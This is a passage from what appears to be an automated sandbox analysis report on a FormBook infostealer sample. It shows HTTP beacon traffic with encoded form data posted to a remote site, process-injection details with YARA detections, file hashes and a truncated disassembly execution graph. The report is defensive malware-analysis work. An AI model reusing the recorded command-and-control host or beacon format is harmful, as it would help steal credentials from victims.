                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 35 39 42 57 43 58 4b 62 39 2b 4b 48 66 68 54 66 34 6d 45 6d 33 44 75 31 54 4f 67 3d 3d
                                                                                                  Data Ascii: FBEd=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhB59BWCXKb9+KHfhTf4mEm3Du1TOg==
                                                                                                  May 8, 2024 10:51:46.567851067 CEST1070INHTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 795
                                                                                                  date: Wed, 08 May 2024 08:51:46 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                                  platform: hostinger
                                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  39192.168.2.1049750217.196.55.202801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:49.096772909 CEST1813OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.empowermedeco.com
                                                                                                  Origin: http://www.empowermedeco.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.empowermedeco.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 77 48 44 6c 46 66 7a 5a 2f 49 66 64 6e 42 6a 6d 7a 51 33 57 4b 65 59 72 64 47 47 34 77 30 73 63 73 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 56 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 [TRUNCATED]
                                                                                                  Data Ascii: FBEd=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWb3NnwHDlFfzZ/IfdnBjmzQ3WKeYrdGG4w0scsKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fV/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZwjLvViXzLp0fW7PSxZJU4aI0Z4SPFCBx8ZQZWgNQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu95mqcFpNDCSj7UBc5W2NVu2TKkbgT8SvDXRlNMmMEB+LT5MQsmWzWkZ2xbmylKhMIHMdrbC9pMmmfpHhDCX66M6zzu6tIB7M111cAKylGWpy09w6HHGDk95Dk/DKinjKg9y4hkY9g0V/G1QCphA+nNI4+VS6gng4FvKQ6NMSB4fbVme9iuVLKjCxiAEwaeOxv4pDcSEcBd4DUSFaNuegAcIZvJQJYRpd1KAQ1g38x12CunvTPyzSOVBmnXfV3zJWeze2cQH1QSipUz0tZLRfNXuoO1nJV+ywXooox5/pMLCkx0Bh/pKCRuGM78lBposkFG3/PIWILBoeknnO/kP2v/JY8jI+pDOpkUf5uUCTMVNlXQuSJSNY2xp3bT0z7R6vtuZoPXkkhHqM5qVFT3iV9j4v5KR1m8KeEp+gl6DjXRQbiUx9JUCDLfI2bKlUI8HXKiFq+2rbeY2f2LA6GUvw13h8dEq46kTrPJ6r6RaK7rS1lN1L1720ATPaCD2h0GomESuVDixYobxrU9LbE [TRUNCATED]
                                                                                                  May 8, 2024 10:51:49.303035021 CEST1070INHTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 795
                                                                                                  date: Wed, 08 May 2024 08:51:49 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.empowermedeco.com/fo8o/
                                                                                                  platform: hostinger
                                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  40192.168.2.1049751217.196.55.202801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:51:51.833359003 CEST503OUTGET /fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.empowermedeco.com
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:51:52.040632010 CEST1205INHTTP/1.1 301 Moved Permanently
                                                                                                  Connection: close
                                                                                                  content-type: text/html
                                                                                                  content-length: 795
                                                                                                  date: Wed, 08 May 2024 08:51:51 GMT
                                                                                                  server: LiteSpeed
                                                                                                  location: https://www.empowermedeco.com/fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch
                                                                                                  platform: hostinger
                                                                                                  content-security-policy: upgrade-insecure-requests
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:10:48:28
                                                                                                  Start date:08/05/2024
                                                                                                  Path:C:\Users\user\Desktop\Document 151-512024.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Document 151-512024.exe"
                                                                                                  Imagebase:0x940000
                                                                                                  File size:1'246'208 bytes
                                                                                                  MD5 hash:8E009A43143D3AFDDE5E91B311E4018B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:10:48:29
                                                                                                  Start date:08/05/2024
                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\Document 151-512024.exe"
                                                                                                  Imagebase:0x1f0000
                                                                                                  File size:46'504 bytes
                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:9
                                                                                                  Start time:10:48:36
                                                                                                  Start date:08/05/2024
                                                                                                  Path:C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe"
                                                                                                  Imagebase:0xbe0000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:10
                                                                                                  Start time:10:48:38
                                                                                                  Start date:08/05/2024
                                                                                                  Path:C:\Windows\SysWOW64\netbtugc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                                                                  Imagebase:0x3d0000
                                                                                                  File size:22'016 bytes
                                                                                                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:moderate
                                                                                                  Has exited:false

                                                                                                  Target ID:12
                                                                                                  Start time:10:48:53
                                                                                                  Start date:08/05/2024
                                                                                                  Path:C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe"
                                                                                                  Imagebase:0xbe0000
                                                                                                  File size:140'800 bytes
                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  Target ID:14
                                                                                                  Start time:10:49:05
                                                                                                  Start date:08/05/2024
                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                  Imagebase:0x7ff613480000
                                                                                                  File size:676'768 bytes
                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:3.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                                    Signature Coverage:3%
                                                                                                    Total number of Nodes:2000
                                                                                                    Total number of Limit Nodes:38
                                                                                                    execution_graph 96887 943156 96890 943170 96887->96890 96891 943187 96890->96891 96892 94318c 96891->96892 96893 9431eb 96891->96893 96930 9431e9 96891->96930 96897 943265 PostQuitMessage 96892->96897 96898 943199 96892->96898 96895 982dfb 96893->96895 96896 9431f1 96893->96896 96894 9431d0 DefWindowProcW 96932 94316a 96894->96932 96939 9418e2 10 API calls 96895->96939 96899 94321d SetTimer RegisterWindowMessageW 96896->96899 96900 9431f8 96896->96900 96897->96932 96902 9431a4 96898->96902 96903 982e7c 96898->96903 96907 943246 CreatePopupMenu I_RpcFreeBuffer 96899->96907 96899->96932 96904 982d9c 96900->96904 96905 943201 KillTimer 96900->96905 96908 982e68 96902->96908 96909 9431ae 96902->96909 96945 9abf30 34 API calls ___scrt_fastfail 96903->96945 96911 982da1 96904->96911 96912 982dd7 MoveWindow 96904->96912 96935 9430f2 Shell_NotifyIconW ___scrt_fastfail 96905->96935 96906 982e1c 96940 95e499 42 API calls 96906->96940 96916 943253 96907->96916 96944 9ac161 27 API calls ___scrt_fastfail 96908->96944 96917 982e4d 96909->96917 96918 9431b9 96909->96918 96920 982dc6 SetFocus 96911->96920 96921 982da7 96911->96921 96912->96932 96937 94326f 44 API calls ___scrt_fastfail 96916->96937 96917->96894 96943 9a0ad7 22 API calls 96917->96943 96918->96916 96924 9431c4 96918->96924 96919 982e8e 96919->96894 96919->96932 96920->96932 96921->96924 96926 982db0 96921->96926 96922 943214 96936 943c50 DeleteObject DestroyWindow 96922->96936 96923 943263 96923->96932 96924->96894 96941 9430f2 Shell_NotifyIconW ___scrt_fastfail 96924->96941 96938 9418e2 10 API calls 96926->96938 96930->96894 96933 982e41 96942 943837 49 API calls ___scrt_fastfail 96933->96942 96935->96922 96936->96932 96937->96923 96938->96932 96939->96906 96940->96924 96941->96933 96942->96930 96943->96930 96944->96923 96945->96919 96946 942e37 97025 94a961 96946->97025 96950 942e6b 97044 943a5a 96950->97044 96952 942e7f 97051 949cb3 96952->97051 96957 982cb0 97099 9b2cf9 96957->97099 96958 942ead 97079 94a8c7 96958->97079 96960 982cc3 96962 982ccf 96960->96962 97125 944f39 96960->97125 96966 944f39 68 API calls 96962->96966 96963 942ec3 97083 946f88 22 API calls 96963->97083 96968 982ce5 96966->96968 96967 942ecf 96969 949cb3 22 API calls 96967->96969 97131 943084 22 API calls 96968->97131 96970 942edc 96969->96970 97084 94a81b 41 API calls 96970->97084 96973 982d02 97132 943084 22 API calls 96973->97132 96974 942eec 96975 949cb3 22 API calls 96974->96975 96976 942f12 96975->96976 97085 94a81b 41 API calls 96976->97085 96979 982d1e 96980 943a5a 24 API calls 96979->96980 96981 982d44 96980->96981 97133 943084 22 API calls 96981->97133 96982 942f21 96985 94a961 22 API calls 96982->96985 96984 982d50 96986 94a8c7 22 API calls 96984->96986 96987 942f3f 96985->96987 96988 982d5e 96986->96988 97086 943084 22 API calls 96987->97086 97134 943084 22 API calls 96988->97134 96991 942f4b 97087 964a28 40 API calls 3 library calls 96991->97087 96992 982d6d 96997 94a8c7 22 API calls 96992->96997 96994 942f59 96994->96968 96995 942f63 96994->96995 97088 964a28 40 API calls 3 library calls 96995->97088 96999 982d83 96997->96999 96998 942f6e 96998->96973 97000 942f78 96998->97000 97135 943084 22 API calls 96999->97135 97089 964a28 40 API calls 3 library calls 97000->97089 97003 982d90 97004 942f83 97004->96979 97005 942f8d 97004->97005 97090 964a28 40 API calls 3 library calls 97005->97090 97007 942f98 97008 942fdc 97007->97008 97091 943084 22 API calls 97007->97091 97008->96992 97009 942fe8 97008->97009 97009->97003 97093 9463eb 22 API calls 97009->97093 97012 942fbf 97014 94a8c7 22 API calls 97012->97014 97013 942ff8 97094 946a50 22 API calls 97013->97094 97016 942fcd 97014->97016 97092 943084 22 API calls 97016->97092 97017 943006 97095 9470b0 23 API calls 97017->97095 97022 943021 97023 943065 97022->97023 97096 946f88 22 API calls 97022->97096 97097 9470b0 23 API calls 97022->97097 97098 943084 22 API calls 97022->97098 97136 95fe0b 97025->97136 97027 94a976 97146 95fddb 97027->97146 97029 942e4d 97030 944ae3 97029->97030 97031 944af0 __wsopen_s 97030->97031 97033 944b22 97031->97033 97174 946b57 97031->97174 97043 944b58 97033->97043 97171 944c6d 97033->97171 97035 944c29 97036 949cb3 22 API calls 97035->97036 97037 944c5e 97035->97037 97039 944c52 97036->97039 97037->96950 97038 949cb3 22 API calls 97038->97043 97040 94515f 22 API calls 97039->97040 97040->97037 97042 944c6d 22 API calls 97042->97043 97043->97035 97043->97038 97043->97042 97186 94515f 97043->97186 97203 981f50 97044->97203 97047 949cb3 22 API calls 97048 943a8d 97047->97048 97205 943aa2 97048->97205 97050 943a97 97050->96952 97052 949cc2 _wcslen 97051->97052 97053 95fe0b 22 API calls 97052->97053 97054 949cea __fread_nolock 97053->97054 97055 95fddb 22 API calls 97054->97055 97056 942e8c 97055->97056 97057 944ecb 97056->97057 97225 944e90 LoadLibraryA 97057->97225 97062 944ef6 LoadLibraryExW 97233 944e59 LoadLibraryA 97062->97233 97063 983ccf 97064 944f39 68 API calls 97063->97064 97066 983cd6 97064->97066 97068 944e59 3 API calls 97066->97068 97072 983cde 97068->97072 97070 944f20 97071 944f2c 97070->97071 97070->97072 97073 944f39 68 API calls 97071->97073 97255 9450f5 97072->97255 97075 942ea5 97073->97075 97075->96957 97075->96958 97078 983d05 97080 94a8ea __fread_nolock 97079->97080 97081 94a8db 97079->97081 97080->96963 97081->97080 97082 95fe0b 22 API calls 97081->97082 97082->97080 97083->96967 97084->96974 97085->96982 97086->96991 97087->96994 97088->96998 97089->97004 97090->97007 97091->97012 97092->97008 97093->97013 97094->97017 97095->97022 97096->97022 97097->97022 97098->97022 97100 9b2d15 97099->97100 97101 94511f 64 API calls 97100->97101 97102 9b2d29 97101->97102 97526 9b2e66 97102->97526 97105 9b2d3f 97105->96960 97106 9450f5 40 API calls 97107 9b2d56 97106->97107 97108 9450f5 40 API calls 97107->97108 97109 9b2d66 97108->97109 97110 9450f5 40 API calls 97109->97110 97111 9b2d81 97110->97111 97112 9450f5 40 API calls 97111->97112 97113 9b2d9c 97112->97113 97114 94511f 64 API calls 97113->97114 97115 9b2db3 97114->97115 97116 96ea0c ___std_exception_copy 21 API calls 97115->97116 97117 9b2dba 97116->97117 97118 96ea0c ___std_exception_copy 21 API calls 97117->97118 97119 9b2dc4 97118->97119 97120 